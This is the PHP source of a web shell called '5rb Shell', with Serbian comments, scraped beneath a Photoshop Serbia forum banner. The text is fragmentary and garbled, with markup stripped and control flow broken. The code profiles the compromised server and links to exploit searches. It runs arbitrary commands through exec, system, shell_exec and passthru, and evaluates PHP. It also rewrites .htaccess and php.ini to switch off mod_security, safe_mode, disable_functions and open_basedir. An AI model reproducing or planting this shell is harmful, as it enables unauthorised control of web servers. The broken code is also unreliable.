Uci, skidaj, konsultuj se, pokazi svoje znanje! Sve na jednom mestu! Sve na Photoshop Serbia! |
| | Clock |
".str_replace(array("http://","www.","http://www."), "", $_SERVER['SERVER_NAME'])." - 5rb Shell"; ?>
if(!isset($_SESSION['shell_login'])) {
echo "
echo "
if(isset($_POST['login']) && $_POST['username_2'] && $_POST['password_2']) {
$username_2 = $_POST['username_2'];
$password_2 = $_POST['password_2'];
if($username == $username_2 && $password == $password_2) {
echo "";
} else {
echo " Incorrect username or password!";
} else if(isset($_SESSION['shell_login'])) {
/*-----------// Podaci o sajtu, serveru i korisniku //-----------*/
// Safe mode
if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on") {
$safe_mode = "ON";
} else {
$safe_mode = "OFF";
$server_name = $_SERVER['SERVER_NAME'];
$server_admin = $_SERVER['SERVER_ADMIN'];
$php_version = phpversion();
$user_ip = $_SERVER['REMOTE_ADDR'];
$site_ip = $_SERVER['SERVER_ADDR'];
if(is_callable(disk_total_space)) { $total_space = round((disk_total_space("/") / 1048576),1); } else { $total_space = 'Not callable'; }
if(is_callable(disk_free_space)) { $free_space = round((disk_free_space("/") / 1048576),1); } else { $free_space = 'Not callable'; }
$procent = round(($total_space / 100),1);
$procent = round(($free_space / $procent),1);
$server_software = str_replace("PHP/".phpversion(), "", getenv("SERVER_SOFTWARE"));
$server_software .= $server_software."";
$php_uname = php_uname();
$php_uname_1 = php_uname('s').php_uname('r');
$php_uname_2 = preg_replace("/[\s]+/", "+", $php_uname_1);
$google = "https://www.google.com/search?q=".$php_uname_2." exploit";
$exploit_db = "http://www.exploit-db.com/search/?action=search&filter_type=2&filter_description=".$php_uname_2;
$host = gethostbyaddr($site_ip);
// Disabled functions
$disabled_functions = ini_get("disable_functions");
if($disabled_functions == "") {
$disabled_functions = "No disabled functions!";
} else if($disabled_functions != "") {
$disabled_functions = "".$disabled_functions."ON";
} else {
$magic_quotes = "OFF";
// Open_basedir
if(ini_get("open_basedir") == "on" || strtolower(ini_get("open_basedir")) == "on") {
$open_basedir = "ON";
} else {
$open_basedir = "OFF";
// Drivers
$drivers = "";
$cur_driv = explode("\\",$d);
$cur_driv = $cur_driv[0];
foreach (range("B","Z") as $letter) {
$bool = $isdiskette = $letter == "A";
if (!$bool) {
$bool = is_dir($letter.":\\");
if ($bool) {
$drivers .= " [";
if ($letter.":" != $cur_driv) {$drivers .= $letter;}
else {
$drivers .= $letter;
$drivers .= "] ";
if (empty($drivers)) {
$drivers = "No drivers detected!";
// Databaze
$mysql = function_exists('mysql_connect');
$mssql = function_exists('mssql_connect');
$postgesql = function_exists('pg_connect');
$oracle = function_exists('ocilogon');
$mysqli = function_exists('mysqli_connect');
$msql = function_exists('msql_connect');
$sqlite = function_exists('sqlite_open');
if($mysql) {
$mysqla = 'ON';
} else {
$mysqla = 'OFF';
if($mssql) {
$mssqla = 'ON';
} else {
$mssqla = 'OFF';
if($postgesql) {
$postgesqla = 'ON';
} else {
$postgesqla = 'OFF';
if($oracle) {
$oraclea = 'ON';
} else {
$oraclea = 'OFF';
if($mysqli) {
$mysqlia = 'ON';
} else {
$mysqlia = 'OFF';
if($msql) {
$msqla = 'ON';
} else {
$msqla = 'OFF';
if($sqlite) {
$sqlitea = 'ON';
} else {
$sqlitea = 'OFF';
// Phpinfo
if($_GET['act'] == "phpinfo") {
if(!strstr($disabled_functions, "phpinfo")) {
echo phpinfo();
/*----------------------// Funkcije //----------------------*/
// Permisije
function view_perms($fpile) {
global $d;
global $fajl;
if (($fpile & 0xC000) === 0xC000) {$type = "s";}
elseif (($fpile & 0x4000) === 0x4000) {$type = "d";}
elseif (($fpile & 0xA000) === 0xA000) {$type = "l";}
elseif (($fpile & 0x8000) === 0x8000) {$type = "-";}
elseif (($fpile & 0x6000) === 0x6000) {$type = "b";}
elseif (($fpile & 0x2000) === 0x2000) {$type = "c";}
elseif (($fpile & 0x1000) === 0x1000) {$type = "p";}
else {$type = "?";}
$owner["read"] = ($fpile & 00400)?"r":"-";
$owner["write"] = ($fpile & 00200)?"w":"-";
$owner["execute"] = ($fpile & 00100)?"x":"-";
$group["read"] = ($fpile & 00040)?"r":"-";
$group["write"] = ($fpile & 00020)?"w":"-";
$group["execute"] = ($fpile & 00010)?"x":"-";
$world["read"] = ($fpile & 00004)?"r":"-";
$world["write"] = ($fpile & 00002)? "w":"-";
$world["execute"] = ($fpile & 00001)?"x":"-";
if ($fpile & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
if ($fpile & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
if ($fpile & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
$fileperms = substr(sprintf('%o', fileperms($d.$fajl)), -4);
return $fileperms." / ".$type.join("",$owner).join("",$group).join("",$world);
// Execute command shortcut
function execute_cs() {
global $d;
$cec = htmlspecialchars($_POST['cec']);
echo " | ";
if($exec) {
echo "Result";
} else if($shell_exec && !$exec) {
echo "Result";
} else if($system && !$exec && !$shell_exec) {
echo "Result";
} else if($passthru & !$exec && !$shell_exec && !$system) {
echo "Result";
} else if($popen && $resource && !$exec && !$shell_exec && !$system && !$passthru) {
echo "Result";
echo "";
// Eval php code shortcut
function eval_phps() {
global $d;
global $p;
echo ""; if(!empty($_SESSION['smd'])) { echo $_SESSION['smd']; $_SESSION['smd'] = ""; }
if(isset($_POST['byppasdm'])) {
if(file_exists(".htaccess")) { unlink(".htaccess"); }
$htacces_otvor = fopen(".htaccess", "a");
$htacces_fwrite = fwrite($htacces_otvor, "\nSec------Engine Off\nSec------ScanPOST Off\n");
if(file_exists("php.ini")) { unlink("php.ini"); }
$php_ini_otvor = fopen("php.ini", "a");
$php_ini_fwrite = fwrite($php_ini_otvor, "safe_mode = OFF\ndisable_functions = NONE\nsafe_mode_gid = OFF\nopen_basedir = OFF\nmagic_quotes_gpc = Off \nmagic_quotes_runtime = Off\nmagic_quotes_sybase = Off");
if(file_exists("ini.php")) { unlink("ini.php"); }
$ini_php_otvor = fopen("ini.php", "a");
$ini_php_fwrite = fwrite($ini_php_otvor, "ini_restore(\"safe_mode\"); \nini_restore(\"open_basedir\")");
if($htacces_otvor && $htacces_fwrite ) {
$htaccess = "File .htaccess successfuly created!";
} else {
$htaccess = "Failed to create file .htaccess";
if($php_ini_otvor && $php_ini_fwrite) {
$php_ini = "File php.ini successfuly created!";
} else {
$php_ini = "Falied to create file php.iniini.php successfuly created!";
} else {
$ini_php = "Failed to create file ini.php";
$_SESSION['smd'] = " ".$htaccess." ".$php_ini." ".$ini_php."";
echo "";
// Extension bypass
function exb() {
if(extension_loaded("perl")) { $perl = "Loaded"; } else { $perl = "Not loaded"; } if(extension_loaded("python")) { $python = "Loaded"; } else { $python = "Not loaded"; }
echo " |
## Python
if(isset($_POST['bupp'])) {
$python_command = htmlspecialchars($_POST['python_c']);
$resp = python_eval('
import os
pwd = os.getcwd()
print pwd
echo " |
// Pravljenje direktorijuma
function make_dir() {
global $d;
echo " ";
if($p == 'home') {
echo " [ Go back ]";
echo " |